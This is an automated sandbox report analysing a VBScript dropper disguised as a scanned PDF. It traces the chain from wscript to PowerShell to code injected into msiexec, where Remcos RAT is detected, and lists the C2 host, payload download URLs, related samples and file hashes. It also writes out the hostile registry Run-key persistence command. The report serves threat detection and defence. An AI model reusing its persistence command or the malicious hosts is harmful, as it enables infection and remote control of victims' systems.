              Source: Yara match | File source: 00000009.00000002.2629630958.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000002.2629630958.0000000009AAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              MITRE ATT&CK Matrix (one line per tactic; the number preceding a technique is the count shown beside it in the report)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
              Resource Development: 321 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
              Execution: 1 Windows Management Instrumentation; 2 Exploitation for Client Execution; 2 Command and Scripting Interpreter; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
              Persistence: 321 Scripting; 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Privilege Escalation: 1 DLL Side-Loading; 311 Process Injection; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Defense Evasion: 12 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 1 Modify Registry; 31 Virtualization/Sandbox Evasion; 311 Process Injection; Indicator Removal from Tools
              Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
              Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
              Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
              Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 213 Application Layer Protocol; Commonly Used Port; Application Layer Protocol
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              Behavior Graph ID: 1538696 | Sample: Scanned_22C-6e24090516030.pdf.vbs | Startdate: 21/10/2024 | Architecture: WINDOWS | Score: 100

              Start
                Network: blackass.duckdns.org (Uses dynamic DNS services); www.groupriam.com; 3 other IPs or domains
                Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
                wscript.exe 1 (started)
                  Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
                  powershell.exe 14 18 (started)
                    Network: groupriam.com 199.103.62.205, ports 443, 49736, 49973, CIRRUSTECHLTDCA, Canada
                    Signatures: Found suspicious powershell code related to unpacking or dynamic code loading
                    conhost.exe (started)
                  PING.EXE 1 (started)
                    conhost.exe (started)
                powershell.exe 18 (started)
                  Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
                  msiexec.exe 5 14 (started)
                    Network: blackass.duckdns.org 193.187.91.214, ports 49975, 49976, 53241, OBE-EUROPEObenetworkEuropeSE, Sweden; geoplugin.net 178.237.33.50, ports 49977, 80, ATOM86-ASATOM86NL, Netherlands
                    Signatures: Detected Remcos RAT
                    cmd.exe 1 (started)
                      conhost.exe (started)
                      reg.exe 1 1 (started)
                  conhost.exe (started)

              Source | Detection | Scanner | Label | Link
              Scanned_22C-6e24090516030.pdf.vbs | 3% | ReversingLabs | |

              No Antivirus matches
              No Antivirus matches
              No Antivirus matches

              Source | Detection | Scanner | Label | Link
              http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
              http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
              https://go.micro | 0% | URL Reputation | safe |
              https://contoso.com/ | 0% | URL Reputation | safe |
              https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
              https://contoso.com/License | 0% | URL Reputation | safe |
              https://contoso.com/Icon | 0% | URL Reputation | safe |
              https://aka.ms/pscore68 | 0% | URL Reputation | safe |
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
              NameIPActiveMaliciousAntivirus DetectionReputation
              blackass.duckdns.org
              193.187.91.214
              truetrue
                unknown
                geoplugin.net
                178.237.33.50
                truefalse
                  unknown
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    unknown
                    groupriam.com
                    199.103.62.205
                    truefalse
                      unknown
                      gormezl_6777.6777.6777.677e
                      unknown
                      unknowntrue
                        unknown
                        www.groupriam.com
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://geoplugin.net/json.gpfalse
                          • URL Reputation: safe
                          unknown
                          blackass.duckdns.orgtrue
                            unknown
                            https://www.groupriam.com/Mandschauvinisme.snpfalse
                              unknown
                              https://www.groupriam.com/PrOrl135.binfalse
                                unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1465567193.00000229F6255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.groupriam.com | powershell.exe, 00000004.00000002.1440004827.00000229E6407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1440004827.00000229E7EF6000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB_q | powershell.exe, 00000006.00000002.1703384031.0000000004F91000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://www.groupriam.com | powershell.exe, 00000004.00000002.1440004827.00000229E7F5F000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
https://go.micro | powershell.exe, 00000004.00000002.1440004827.00000229E6DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://bruta.pl/Mandschauvinisme.snp | powershell.exe, 00000004.00000002.1440004827.00000229E77A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1440004827.00000229E6407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1465567193.00000229F6255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1440004827.00000229E61E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://groupriam.com | powershell.exe, 00000004.00000002.1440004827.00000229E7F5F000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1440004827.00000229E61E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1703384031.0000000004F91000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
https://go.microsofd | powershell.exe, 00000004.00000002.1473366610.00000229FE7EA000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
199.103.62.205 | groupriam.com | Canada | 36218 | CIRRUSTECHLTDCA | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
193.187.91.214 | blackass.duckdns.org | Sweden | 197595 | OBE-EUROPEObenetworkEuropeSE | true
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1538696
                                                Start date and time:2024-10-21 17:05:58 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 19s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:17
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Scanned_22C-6e24090516030.pdf.vbs
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winVBS@16/10@4/3
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 62%
                                                • Number of executed functions: 33
                                                • Number of non-executed functions: 18
                                                Cookbook Comments:
                                                • Found application associated with file extension: .vbs
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 93.184.221.240
                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net
                                                • Execution Graph export aborted for target powershell.exe, PID 7216 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7972 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: Scanned_22C-6e24090516030.pdf.vbs
Time | Type | Description
11:06:58 | API Interceptor | 1x Sleep call for process: wscript.exe modified
11:07:01 | API Interceptor | 89x Sleep call for process: powershell.exe modified
11:08:30 | API Interceptor | 177170x Sleep call for process: msiexec.exe modified
17:06:48 | Task Scheduler | Run new task: {EC5AE4E4-E42E-4D75-A7BE-104674D89A54} path: .
17:07:51 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)
17:07:59 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
199.103.62.205 | ImBm40hNZ2.exe | malicious | FormBook, GuLoader |
199.103.62.205 | 02_deb64ed.bin.exe | malicious | GuLoader |
199.103.62.205 | Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbs | malicious | FormBook, GuLoader |
199.103.62.205 | Richiesta di Offerta - Catalogo Campione.vbs | malicious | GuLoader |
199.103.62.205 | #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | malicious | FormBook, GuLoader |
199.103.62.205 | Anfrage f#U00fcr ein Angebot - Musterkatalog.vbs | malicious | FormBook, GuLoader |
199.103.62.205 | 47#U0627.vbs | malicious | FormBook, GuLoader |
178.237.33.50 | Order.vbs | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | 1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | duEsmKBlGr.exe | malicious | Unknown | www.geoplugin.net/xml.gp?ip=SEU_IP
178.237.33.50 | lA0Z0vjXfA.exe | malicious | Unknown | www.geoplugin.net/xml.gp?ip=SEU_IP
178.237.33.50 | 172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | SKM_0001810-01-2024-GL-3762.bat | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exe | malicious | Unknown | www.geoplugin.net/xml.gp?ip=SEU_IP
178.237.33.50 | Ibnh3BCQSQ.exe | malicious | Unknown | www.geoplugin.net/xml.gp?ip=SEU_IP
178.237.33.50 | nicetokissthebestthingsiwantotgetmebackwith.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net | https://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5f | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Thermo Fisher RFQ_TFS-1702.xls | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20= | malicious | HTMLPhisher, Mamba2FA | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2FCGJiV2TYiHhEjaWZAqcgtold/S0pvbmVzQGtvbmlhZy1ncy5jb20= | malicious | HTMLPhisher, Mamba2FA | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2FQVUPgqjgXFIkJFnzej6vlwSU/RENhcm5vdnNreUBrb25pYWctZ3MuY29t | malicious | HTMLPhisher, Mamba2FA | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2Fn8shpNHR5esID4MN5V6n2I56/RENhcm5vdnNreUBrb25pYWctZ3MuY29t | malicious | HTMLPhisher, Mamba2FA | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | index.html | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://infinconsumer.lh1ondemand.com/ | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | PDWsetup.exe | malicious | GhostRat | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://docs.google.com/drawings/d/1rNIRSAgTQ9BvkQDgt6I1-bvyHw8Lwl60PfNx3hGnniY/preview?pli=128762876287628762876287628762876 | malicious | Unknown | 13.107.246.45
geoplugin.net | Order.vbs | malicious | Remcos | 178.237.33.50
geoplugin.net | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | 1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | SKM_0001810-01-2024-GL-3762.bat | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | nicetokissthebestthingsiwantotgetmebackwith.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CIRRUSTECHLTDCA | ImBm40hNZ2.exe | malicious | FormBook, GuLoader | 199.103.62.205
CIRRUSTECHLTDCA | 02_deb64ed.bin.exe | malicious | GuLoader | 199.103.62.205
CIRRUSTECHLTDCA | Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbs | malicious | FormBook, GuLoader | 199.103.62.205
CIRRUSTECHLTDCA | Richiesta di Offerta - Catalogo Campione.vbs | malicious | GuLoader | 199.103.62.205
CIRRUSTECHLTDCA | #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | malicious | FormBook, GuLoader | 199.103.62.205
CIRRUSTECHLTDCA | Anfrage f#U00fcr ein Angebot - Musterkatalog.vbs | malicious | FormBook, GuLoader | 199.103.62.205
CIRRUSTECHLTDCA | 47#U0627.vbs | malicious | FormBook, GuLoader | 199.103.62.205
CIRRUSTECHLTDCA | g5oo6DQ4pd.exe | malicious | Unknown | 208.69.57.105
CIRRUSTECHLTDCA | OQchDohurA.exe | malicious | Raccoon SmokeLoader | 192.228.108.27
ATOM86-ASATOM86NL | Order.vbs | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | 1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | duEsmKBlGr.exe | malicious | Unknown | 178.237.33.50
ATOM86-ASATOM86NL | lA0Z0vjXfA.exe | malicious | Unknown | 178.237.33.50
ATOM86-ASATOM86NL | 172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | SKM_0001810-01-2024-GL-3762.bat | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exe | malicious | Unknown | 178.237.33.50
ATOM86-ASATOM86NL | Ibnh3BCQSQ.exe | malicious | Unknown | 178.237.33.50
ATOM86-ASATOM86NL | nicetokissthebestthingsiwantotgetmebackwith.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
OBE-EUROPEObenetworkEuropeSE | SKM_0001810-01-2024-GL-3762.bat | malicious | Remcos, GuLoader | 193.187.91.216
OBE-EUROPEObenetworkEuropeSE | SKU_0001710-1-2024-SX-3762.bat | malicious | Remcos, GuLoader | 193.187.91.216
OBE-EUROPEObenetworkEuropeSE | XClient.exe | malicious | AsyncRAT, XWorm | 194.32.149.14
OBE-EUROPEObenetworkEuropeSE | bot_library.exe | malicious | Unknown | 193.182.111.131
OBE-EUROPEObenetworkEuropeSE | z2PO20240815.pdf.lnk | malicious | XWorm | 193.187.91.208
OBE-EUROPEObenetworkEuropeSE | SecuriteInfo.com.Win32.PWSX-gen.24212.14364.exe | malicious | Remcos, PureLog Stealer | 193.187.91.216
OBE-EUROPEObenetworkEuropeSE | https://www.canva.com/design/DAGLxvJi_b4/I2I9hVBC94poYJRY8neUTg/view?utm_content=DAGLxvJi_b4&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | HTMLPhisher | 194.32.144.119
OBE-EUROPEObenetworkEuropeSE | REV-New Order 20240717^^^^^^^^^^^^^^^^^^.pif.exe | malicious | PureLog Stealer | 193.187.91.208
OBE-EUROPEObenetworkEuropeSE | REV-New Order 20240717.pif.exe | malicious | Remcos | 193.187.91.124
OBE-EUROPEObenetworkEuropeSE | SecuriteInfo.com.AutoIt.Injector-JY.190.10007.exe | malicious | Unknown | 193.182.111.41
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Order.vbs | malicious | Remcos | 199.103.62.205
3b5074b1b5d032e5620f69f9f700ff0e | index.html | malicious | Unknown | 199.103.62.205
3b5074b1b5d032e5620f69f9f700ff0e | Ricevuta_di_pagamento.vbs | malicious | GuLoader | 199.103.62.205
3b5074b1b5d032e5620f69f9f700ff0e | https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20= | malicious | HTMLPhisher, Mamba2FA | 199.103.62.205
3b5074b1b5d032e5620f69f9f700ff0e | https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2Fn8shpNHR5esID4MN5V6n2I56/RENhcm5vdnNreUBrb25pYWctZ3MuY29t | malicious | HTMLPhisher, Mamba2FA | 199.103.62.205
3b5074b1b5d032e5620f69f9f700ff0e | index.html | malicious | Unknown | 199.103.62.205
3b5074b1b5d032e5620f69f9f700ff0e | TENDER ADDENDUM NO. 01.vbs | malicious | GuLoader | 199.103.62.205
3b5074b1b5d032e5620f69f9f700ff0e | IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs | malicious | Remcos, GuLoader | 199.103.62.205
3b5074b1b5d032e5620f69f9f700ff0e | RFQ 1307.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 199.103.62.205
3b5074b1b5d032e5620f69f9f700ff0e | Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs | malicious | GuLoader | 199.103.62.205
37f463bf4616ecd445d4a1937da06e19 | Ricevuta_di_pagamento.vbs | malicious | GuLoader | 199.103.62.205
37f463bf4616ecd445d4a1937da06e19 | 8VYDvQtXBH.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 199.103.62.205
37f463bf4616ecd445d4a1937da06e19 | proforma.exe | malicious | FormBook, GuLoader | 199.103.62.205
37f463bf4616ecd445d4a1937da06e19 | IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs | malicious | Remcos, GuLoader | 199.103.62.205
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Unknown | 199.103.62.205
37f463bf4616ecd445d4a1937da06e19 | FACTURA RAGOZA.exe | malicious | GuLoader, Snake Keylogger | 199.103.62.205
37f463bf4616ecd445d4a1937da06e19 | Spedizione.vbs | malicious | Unknown | 199.103.62.205
37f463bf4616ecd445d4a1937da06e19 | FACTURA DE PAGO.exe | malicious | GuLoader, Snake Keylogger | 199.103.62.205
37f463bf4616ecd445d4a1937da06e19 | PAGO FRAS. AGOSTO 2024..exe | malicious | GuLoader, Snake Keylogger | 199.103.62.205
37f463bf4616ecd445d4a1937da06e19 | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader | 199.103.62.205
                                                              No context
                                                              Process:C:\Windows\System32\wscript.exe
                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                              Category:dropped
                                                              Size (bytes):71954
                                                              Entropy (8bit):7.996617769952133
                                                              Encrypted:true
                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                              Malicious:false
                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                              Process:C:\Windows\System32\wscript.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):328
                                                              Entropy (8bit):3.150184159866505
                                                              Encrypted:false
                                                              SSDEEP:6:kKK9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:NDnLNkPlE99SNxAhUe/3
                                                              MD5:C036470F3E5C884EE78B7B0DD6CCFA3A
                                                              SHA1:8B3CED6BBA971D4B67E994F6BBAB9ADEF4C9E47A
                                                              SHA-256:AC4A0E662C0DCF043637768FB2AEDC792789A1D77D01F757355D465092199DEE
                                                              SHA-512:7F948A9C1F70C6AAE45EA086B6CC94906BC7B79FBFE3FED46FA37272BA6C226386F2CD1A987BBB6CCDECA7C121535B3FDB8A40987109F2A9BA0B19EB453FA1C4
                                                              Malicious:false
                                                              Preview:UTF-16 string: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab "a7282eb40b1da1:0"
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):960
                                                              Entropy (8bit):5.007342357625525
                                                              Encrypted:false
                                                              SSDEEP:12:tkhEVBnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkL:qhEV1dRNuKyGX85jvXhNlT3/73clHWro
                                                              MD5:C0019D314FB1788D8FE8CBC65C3B6E7B
                                                              SHA1:CC5D5544960CF2DF1776E2BD23622373298DB55D
                                                              SHA-256:C6869361FD0119B2A0E2F96D90D40D92FF66EA71BC3829C0061C51630F3B75FF
